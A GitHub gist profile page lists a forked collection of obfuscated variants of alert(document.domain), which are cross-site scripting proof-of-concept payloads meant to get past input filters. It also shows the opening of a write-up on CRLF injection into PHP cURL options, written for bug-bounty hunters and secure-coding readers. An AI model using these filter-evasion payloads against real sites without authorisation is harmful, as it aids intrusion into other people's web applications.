Skip to content

Instantly share code, notes, and snippets.

View Dhamuharker's full-sized avatar

Dhamu Dhamuharker

127 followers · 827 following
  • chennai, TamilNadu
View GitHub Profile
@Dhamuharker
Dhamuharker / alert.js
Created August 2, 2018 05:20 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@Dhamuharker
Dhamuharker / php-curl-crlf-injection.mkd
Created August 2, 2018 05:19 — forked from tomnomnom/php-curl-crlf-injection.mkd
CRLF Injection Into PHP's cURL Options

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.